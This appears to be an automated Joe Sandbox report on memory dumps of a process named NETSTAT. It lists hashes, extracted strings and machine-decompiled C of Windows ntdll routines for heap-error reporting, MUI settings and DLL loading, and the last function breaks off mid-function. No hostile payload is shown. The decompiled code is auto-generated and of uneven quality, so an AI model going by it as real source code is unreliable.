                • Instruction ID: 7969a92f9330b58734159d53ed67bf2999396720e4b5e6bd63550209cf5c2aa0
                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                • Instruction Fuzzy Hash: 1BE01AB1610208ABDB10DF49CC85EE737ADEF88650F018155FA0857241C934E8118BF5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNELBASE(00008003,?,007C8D14,?), ref: 007CF6FB
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                • Instruction ID: 24ea9ca40830f58452b75ed135a5edebe5a7d9de0d7f45eea015eb823db58809
                • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                • Instruction Fuzzy Hash: D8D05E616503083BE710AAA4DC07F2633896B44B00F490068F948A63C3D964E4004165
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 283bbe6d6a08513676cf6d54235ba233a88cffd860e5a1e3875bad0ee3ae45b0
                • Instruction ID: 4cc251b976045ee1f59c70f1e13a799a76af6b9e7dc4da638bf6b4966d8c0fa4
                • Opcode Fuzzy Hash: 283bbe6d6a08513676cf6d54235ba233a88cffd860e5a1e3875bad0ee3ae45b0
                • Instruction Fuzzy Hash: 88B09B719014C5D5EA11D7654A487177904B7D0751F56C0A6D1020681A4778C091F5B5
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0340B314
                • The resource is owned shared by %d threads, xrefs: 0340B37E
                • *** enter .exr %p for the exception record, xrefs: 0340B4F1
                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0340B476
                • The critical section is owned by thread %p., xrefs: 0340B3B9
                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0340B2DC
                • *** Resource timeout (%p) in %ws:%s, xrefs: 0340B352
                • *** then kb to get the faulting stack, xrefs: 0340B51C
                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0340B39B
                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0340B3D6
                • The resource is owned exclusively by thread %p, xrefs: 0340B374
                • *** An Access Violation occurred in %ws:%s, xrefs: 0340B48F
                • *** Inpage error in %ws:%s, xrefs: 0340B418
                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0340B38F
                • *** enter .cxr %p for the context, xrefs: 0340B50D
                • a NULL pointer, xrefs: 0340B4E0
                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0340B2F3
                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0340B47D
                • <unknown>, xrefs: 0340B27E, 0340B2D1, 0340B350, 0340B399, 0340B417, 0340B48E
                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0340B305
                • an invalid address, %p, xrefs: 0340B4CF
                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0340B53F
                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0340B484
                • The instruction at %p referenced memory at %p., xrefs: 0340B432
                • Go determine why that thread has not released the critical section., xrefs: 0340B3C5
                • read from, xrefs: 0340B4AD, 0340B4B2
                • write to, xrefs: 0340B4A6
                • The instruction at %p tried to %s , xrefs: 0340B4B6
                • This failed because of error %Ix., xrefs: 0340B446
                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0340B323
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                • API String ID: 0-108210295
                • Opcode ID: 83acd9c9a9624f63ebb04bbbf4c1974f9f5e77e919ac1b3775f9c8a620339a74
                • Instruction ID: 45f2c7ad7c67739fa68fa6da085a322ad2d8311634d896faab471cbc23ee3041
                • Opcode Fuzzy Hash: 83acd9c9a9624f63ebb04bbbf4c1974f9f5e77e919ac1b3775f9c8a620339a74
                • Instruction Fuzzy Hash: 6A813379B40220FFDB21EB148CC5D2F3B65EF47A59B0440A6F4241F293D2B1D512DABA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 44%
                			E03411C06() {
                				signed int _t27;
                				char* _t104;
                				char* _t105;
                				intOrPtr _t113;
                				intOrPtr _t115;
                				intOrPtr _t117;
                				intOrPtr _t119;
                				intOrPtr _t120;
                
                				_t105 = 0x33348a4;
                				_t104 = "HEAP: ";
                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                					_push(_t104);
                					E0335B150();
                				} else {
                					E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                				}
                				_push( *0x344589c);
                				E0335B150("Heap error detected at %p (heap handle %p)\n",  *0x34458a0);
                				_t27 =  *0x3445898; // 0x0
                				if(_t27 <= 0xf) {
                					switch( *((intOrPtr*)(_t27 * 4 +  &M03411E96))) {
                						case 0:
                							_t105 = "heap_failure_internal";
                							goto L21;
                						case 1:
                							goto L21;
                						case 2:
                							goto L21;
                						case 3:
                							goto L21;
                						case 4:
                							goto L21;
                						case 5:
                							goto L21;
                						case 6:
                							goto L21;
                						case 7:
                							goto L21;
                						case 8:
                							goto L21;
                						case 9:
                							goto L21;
                						case 0xa:
                							goto L21;
                						case 0xb:
                							goto L21;
                						case 0xc:
                							goto L21;
                						case 0xd:
                							goto L21;
                						case 0xe:
                							goto L21;
                						case 0xf:
                							goto L21;
                					}
                				}
                				L21:
                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                					_push(_t104);
                					E0335B150();
                				} else {
                					E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                				}
                				_push(_t105);
                				E0335B150("Error code: %d - %s\n",  *0x3445898);
                				_t113 =  *0x34458a4; // 0x0
                				if(_t113 != 0) {
                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                						_push(_t104);
                						E0335B150();
                					} else {
                						E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					E0335B150("Parameter1: %p\n",  *0x34458a4);
                				}
                				_t115 =  *0x34458a8; // 0x0
                				if(_t115 != 0) {
                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                						_push(_t104);
                						E0335B150();
                					} else {
                						E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					E0335B150("Parameter2: %p\n",  *0x34458a8);
                				}
                				_t117 =  *0x34458ac; // 0x0
                				if(_t117 != 0) {
                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                						_push(_t104);
                						E0335B150();
                					} else {
                						E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					E0335B150("Parameter3: %p\n",  *0x34458ac);
                				}
                				_t119 =  *0x34458b0; // 0x0
                				if(_t119 != 0) {
                					L41:
                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                						_push(_t104);
                						E0335B150();
                					} else {
                						E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					_push( *0x34458b4);
                					E0335B150("Last known valid blocks: before - %p, after - %p\n",  *0x34458b0);
                				} else {
                					_t120 =  *0x34458b4; // 0x0
                					if(_t120 != 0) {
                						goto L41;
                					}
                				}
                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                					_push(_t104);
                					E0335B150();
                				} else {
                					E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                				}
                				return E0335B150("Stack trace available at %p\n", 0x34458c0);
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                • API String ID: 0-2897834094
                • Opcode ID: 5e5188e05857b7993c8fe4c81d2b165e5b2b491a403b975d7d6d1e46046112b7
                • Instruction ID: 7014cd31e7816ea682d1684cc2f220aa0e0a6759b30dc443a7074fbc2a0be56a
                • Opcode Fuzzy Hash: 5e5188e05857b7993c8fe4c81d2b165e5b2b491a403b975d7d6d1e46046112b7
                • Instruction Fuzzy Hash: 3861D63A921A44DFCA51EB94D4C6D25B3E4FB05930B0980BFFA1A6F341D634AC618E4D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E03363D34(signed int* __ecx) {
                				signed int* _v8;
                				char _v12;
                				signed int* _v16;
                				signed int* _v20;
                				char _v24;
                				signed int _v28;
                				signed int _v32;
                				char _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int* _v48;
                				signed int* _v52;
                				signed int _v56;
                				signed int _v60;
                				char _v68;
                				signed int _t140;
                				signed int _t161;
                				signed int* _t236;
                				signed int* _t242;
                				signed int* _t243;
                				signed int* _t244;
                				signed int* _t245;
                				signed int _t255;
                				void* _t257;
                				signed int _t260;
                				void* _t262;
                				signed int _t264;
                				void* _t267;
                				signed int _t275;
                				signed int* _t276;
                				short* _t277;
                				signed int* _t278;
                				signed int* _t279;
                				signed int* _t280;
                				short* _t281;
                				signed int* _t282;
                				short* _t283;
                				signed int* _t284;
                				void* _t285;
                
                				_v60 = _v60 | 0xffffffff;
                				_t280 = 0;
                				_t242 = __ecx;
                				_v52 = __ecx;
                				_v8 = 0;
                				_v20 = 0;
                				_v40 = 0;
                				_v28 = 0;
                				_v32 = 0;
                				_v44 = 0;
                				_v56 = 0;
                				_t275 = 0;
                				_v16 = 0;
                				if(__ecx == 0) {
                					_t280 = 0xc000000d;
                					_t140 = 0;
                					L50:
                					 *_t242 =  *_t242 | 0x00000800;
                					_t242[0x13] = _t140;
                					_t242[0x16] = _v40;
                					_t242[0x18] = _v28;
                					_t242[0x14] = _v32;
                					_t242[0x17] = _t275;
                					_t242[0x15] = _v44;
                					_t242[0x11] = _v56;
                					_t242[0x12] = _v60;
                					return _t280;
                				}
                				if(E03361B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                					_v56 = 1;
                					if(_v8 != 0) {
                						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                					}
                					_v8 = _t280;
                				}
                				if(E03361B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                					_v60 =  *_v8;
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                					_v8 = _t280;
                				}
                				if(E03361B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                					L16:
                					if(E03361B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                						L28:
                						if(E03361B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                							L46:
                							_t275 = _v16;
                							L47:
                							_t161 = 0;
                							L48:
                							if(_v8 != 0) {
                								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                							}
                							_t140 = _v20;
                							if(_t140 != 0) {
                								if(_t275 != 0) {
                									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                									_t275 = 0;
                									_v28 = 0;
                									_t140 = _v20;
                								}
                							}
                							goto L50;
                						}
                						_t167 = _v12;
                						_t255 = _v12 + 4;
                						_v44 = _t255;
                						if(_t255 == 0) {
                							_t276 = _t280;
                							_v32 = _t280;
                						} else {
                							_t276 = L03374620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                							_t167 = _v12;
                							_v32 = _t276;
                						}
                						if(_t276 == 0) {
                							_v44 = _t280;
                							_t280 = 0xc0000017;
                							goto L46;
                						} else {
                							E0339F3E0(_t276, _v8, _t167);
                							_v48 = _t276;
                							_t277 = E033A1370(_t276, 0x3334e90);
                							_pop(_t257);
                							if(_t277 == 0) {
                								L38:
                								_t170 = _v48;
                								if( *_v48 != 0) {
                									E0339BB40(0,  &_v68, _t170);
                									if(L033643C0( &_v68,  &_v24) != 0) {
                										_t280 =  &(_t280[0]);
                									}
                								}
                								if(_t280 == 0) {
                									_t280 = 0;
                									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                									_v44 = 0;
                									_v32 = 0;
                								} else {
                									_t280 = 0;
                								}
                								_t174 = _v8;
                								if(_v8 != 0) {
                									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                								}
                								_v8 = _t280;
                								goto L46;
                							}
                							_t243 = _v48;
                							do {
                								 *_t277 = 0;
                								_t278 = _t277 + 2;
                								E0339BB40(_t257,  &_v68, _t243);
                								if(L033643C0( &_v68,  &_v24) != 0) {
                									_t280 =  &(_t280[0]);
                								}
                								_t243 = _t278;
                								_t277 = E033A1370(_t278, 0x3334e90);
                								_pop(_t257);
                							} while (_t277 != 0);
                							_v48 = _t243;
                							_t242 = _v52;
                							goto L38;
                						}
                					}
                					_t191 = _v12;
                					_t260 = _v12 + 4;
                					_v28 = _t260;
                					if(_t260 == 0) {
                						_t275 = _t280;
                						_v16 = _t280;
                					} else {
                						_t275 = L03374620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                						_t191 = _v12;
                						_v16 = _t275;
                					}
                					if(_t275 == 0) {
                						_v28 = _t280;
                						_t280 = 0xc0000017;
                						goto L47;
                					} else {
                						E0339F3E0(_t275, _v8, _t191);
                						_t285 = _t285 + 0xc;
                						_v48 = _t275;
                						_t279 = _t280;
                						_t281 = E033A1370(_v16, 0x3334e90);
                						_pop(_t262);
                						if(_t281 != 0) {
                							_t244 = _v48;
                							do {
                								 *_t281 = 0;
                								_t282 = _t281 + 2;
                								E0339BB40(_t262,  &_v68, _t244);
                								if(L033643C0( &_v68,  &_v24) != 0) {
                									_t279 =  &(_t279[0]);
                								}
                								_t244 = _t282;
                								_t281 = E033A1370(_t282, 0x3334e90);
                								_pop(_t262);
                							} while (_t281 != 0);
                							_v48 = _t244;
                							_t242 = _v52;
                						}
                						_t201 = _v48;
                						_t280 = 0;
                						if( *_v48 != 0) {
                							E0339BB40(_t262,  &_v68, _t201);
                							if(L033643C0( &_v68,  &_v24) != 0) {
                								_t279 =  &(_t279[0]);
                							}
                						}
                						if(_t279 == 0) {
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                							_v28 = _t280;
                							_v16 = _t280;
                						}
                						_t202 = _v8;
                						if(_v8 != 0) {
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                						}
                						_v8 = _t280;
                						goto L28;
                					}
                				}
                				_t214 = _v12;
                				_t264 = _v12 + 4;
                				_v40 = _t264;
                				if(_t264 == 0) {
                					_v20 = _t280;
                				} else {
                					_t236 = L03374620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                					_t280 = _t236;
                					_v20 = _t236;
                					_t214 = _v12;
                				}
                				if(_t280 == 0) {
                					_t161 = 0;
                					_t280 = 0xc0000017;
                					_v40 = 0;
                					goto L48;
                				} else {
                					E0339F3E0(_t280, _v8, _t214);
                					_t285 = _t285 + 0xc;
                					_v48 = _t280;
                					_t283 = E033A1370(_t280, 0x3334e90);
                					_pop(_t267);
                					if(_t283 != 0) {
                						_t245 = _v48;
                						do {
                							 *_t283 = 0;
                							_t284 = _t283 + 2;
                							E0339BB40(_t267,  &_v68, _t245);
                							if(L033643C0( &_v68,  &_v24) != 0) {
                								_t275 = _t275 + 1;
                							}
                							_t245 = _t284;
                							_t283 = E033A1370(_t284, 0x3334e90);
                							_pop(_t267);
                						} while (_t283 != 0);
                						_v48 = _t245;
                						_t242 = _v52;
                					}
                					_t224 = _v48;
                					_t280 = 0;
                					if( *_v48 != 0) {
                						E0339BB40(_t267,  &_v68, _t224);
                						if(L033643C0( &_v68,  &_v24) != 0) {
                							_t275 = _t275 + 1;
                						}
                					}
                					if(_t275 == 0) {
                						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                						_v40 = _t280;
                						_v20 = _t280;
                					}
                					_t225 = _v8;
                					if(_v8 != 0) {
                						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                					}
                					_v8 = _t280;
                					goto L16;
                				}
                			}

                Strings
                • WindowsExcludedProcs, xrefs: 03363D6F
                • Kernel-MUI-Language-Allowed, xrefs: 03363DC0
                • Kernel-MUI-Number-Allowed, xrefs: 03363D8C
                • Kernel-MUI-Language-SKU, xrefs: 03363F70
                • Kernel-MUI-Language-Disallowed, xrefs: 03363E97
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                • API String ID: 0-258546922
                • Opcode ID: 95ab439f25050c34666aa189468ccdff11c4e40be64af3a306962a2cb4f4c0c2
                • Instruction ID: d98a57016987df7c2d8bfb404d0789ed752faca18acb3d3ec796a0b6ef8609f9
                • Opcode Fuzzy Hash: 95ab439f25050c34666aa189468ccdff11c4e40be64af3a306962a2cb4f4c0c2
                • Instruction Fuzzy Hash: D5F14A7AD00658EFCB11DF99C9C0AEEBBBDFF49650F14406AE905AB650D7349E01CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 44%
                			E03388E00(void* __ecx) {
                				signed int _v8;
                				char _v12;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t32;
                				intOrPtr _t35;
                				intOrPtr _t43;
                				void* _t46;
                				intOrPtr _t47;
                				void* _t48;
                				signed int _t49;
                				void* _t50;
                				intOrPtr* _t51;
                				signed int _t52;
                				void* _t53;
                				intOrPtr _t55;
                
                				_v8 =  *0x344d360 ^ _t52;
                				_t49 = 0;
                				_t48 = __ecx;
                				_t55 =  *0x3448464; // 0x76d90110
                				if(_t55 == 0) {
                					L9:
                					if( !_t49 >= 0) {
                						if(( *0x3445780 & 0x00000003) != 0) {
                							E033D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                						}
                						if(( *0x3445780 & 0x00000010) != 0) {
                							asm("int3");
                						}
                					}
                					return E0339B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                				}
                				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                				_t43 =  *0x3447984; // 0xb32af0
                				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                					if(_t48 == _t43) {
                						_t50 = 0x5c;
                						if( *_t32 == _t50) {
                							_t46 = 0x3f;
                							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                								_t32 = _t32 + 8;
                							}
                						}
                					}
                					_t51 =  *0x3448464; // 0x76d90110
                					 *0x344b1e0(_t47, _t32,  &_v12);
                					_t49 =  *_t51();
                					if(_t49 >= 0) {
                						L8:
                						_t35 = _v12;
                						if(_t35 != 0) {
                							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                								E03389B10( *((intOrPtr*)(_t48 + 0x48)));
                								_t35 = _v12;
                							}
                							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                						}
                						goto L9;
                					}
                					if(_t49 != 0xc000008a) {
                						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                							if(_t49 != 0xc00000bb) {
                								goto L8;
                							}
                						}
                					}
                					if(( *0x3445780 & 0x00000005) != 0) {
                						_push(_t49);
                						E033D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                						_t53 = _t53 + 0x1c;
                					}
                					_t49 = 0;
                					goto L8;
                				} else {
                					goto L9;
                				}
                			}

                Strings
                • minkernel\ntdll\ldrsnap.c, xrefs: 033C933B, 033C9367
                • LdrpFindDllActivationContext, xrefs: 033C9331, 033C935D
                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 033C932A
                • Querying the active activation context failed with status 0x%08lx, xrefs: 033C9357
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                • API String ID: 0-3779518884
                • Opcode ID: b1d50b5022a5ea2b9219be451a19bb6ffeab992ba0ecc1ec22930c5f8cda6914
                • Instruction ID: 68d28a20e6d4fb4bb7776880cf7b011c6e7733a1c8a15ae896c3afce144ae50b
                • Opcode Fuzzy Hash: b1d50b5022a5ea2b9219be451a19bb6ffeab992ba0ecc1ec22930c5f8cda6914
                • Instruction Fuzzy Hash: 7C41E622A007199FDB35FB188CC9B39B2A9AF05344F8E81A9D8146F571E760BD80C783
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E03368794(void* __ecx) {
                				signed int _v0;
                				char _v8;
                				signed int _v12;
                				void* _v16;
                				signed int _v20;
                				intOrPtr _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v40;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr* _t77;
                				signed int _t80;
                				signed char _t81;
                				signed int _t87;
                				signed int _t91;
                				void* _t92;
                				void* _t94;
                				signed int _t95;
                				signed int _t103;
                				signed int _t105;
                				signed int _t110;
                				signed int _t118;
                				intOrPtr* _t121;
                				intOrPtr _t122;
                				signed int _t125;
                				signed int _t129;
                				signed int _t131;
                				signed int _t134;
                				signed int _t136;
                				signed int _t143;
                				signed int* _t147;
                				signed int _t151;
                				void* _t153;
                				signed int* _t157;
                				signed int _t159;
                				signed int _t161;
                				signed int _t166;
                				signed int _t168;
                
                				_push(__ecx);
                				_t153 = __ecx;
                				_t159 = 0;
                				_t121 = __ecx + 0x3c;
                				if( *_t121 == 0) {
                					L2:
                					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                							L6:
                							if(E0336934A() != 0) {
                								_t159 = E033DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                								__eflags = _t159;
                								if(_t159 < 0) {
                									_t81 =  *0x3445780; // 0x0
                									__eflags = _t81 & 0x00000003;
                									if((_t81 & 0x00000003) != 0) {
                										_push(_t159);
                										E033D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                										_t81 =  *0x3445780; // 0x0
                									}
                									__eflags = _t81 & 0x00000010;
                									if((_t81 & 0x00000010) != 0) {
                										asm("int3");
                									}
                								}
                							}
                						} else {
                							_t159 = E0336849B(0, _t122, _t153, _t159, _t180);
                							if(_t159 >= 0) {
                								goto L6;
                							}
                						}
                						_t80 = _t159;
                						goto L8;
                					} else {
                						_t125 = 0x13;
                						asm("int 0x29");
                						_push(0);
                						_push(_t159);
                						_t161 = _t125;
                						_t87 =  *( *[fs:0x30] + 0x1e8);
                						_t143 = 0;
                						_v40 = _t161;
                						_t118 = 0;
                						_push(_t153);
                						__eflags = _t87;
                						if(_t87 != 0) {
                							_t118 = _t87 + 0x5d8;
                							__eflags = _t118;
                							if(_t118 == 0) {
                								L46:
                								_t118 = 0;
                							} else {
                								__eflags =  *(_t118 + 0x30);
                								if( *(_t118 + 0x30) == 0) {
                									goto L46;
                								}
                							}
                						}
                						_v32 = 0;
                						_v28 = 0;
                						_v16 = 0;
                						_v20 = 0;
                						_v12 = 0;
                						__eflags = _t118;
                						if(_t118 != 0) {
                							__eflags = _t161;
                							if(_t161 != 0) {
                								__eflags =  *(_t118 + 8);
                								if( *(_t118 + 8) == 0) {
                									L22:
                									_t143 = 1;
                									__eflags = 1;
                								} else {
                									_t19 = _t118 + 0x40; // 0x40
                									_t156 = _t19;
                									E03368999(_t19,  &_v16);
                									__eflags = _v0;
                									if(_v0 != 0) {
                										__eflags = _v0 - 1;
                										if(_v0 != 1) {
                											goto L22;
                										} else {
                											_t128 =  *(_t161 + 0x64);
                											__eflags =  *(_t161 + 0x64);
                											if( *(_t161 + 0x64) == 0) {
                												goto L22;
                											} else {
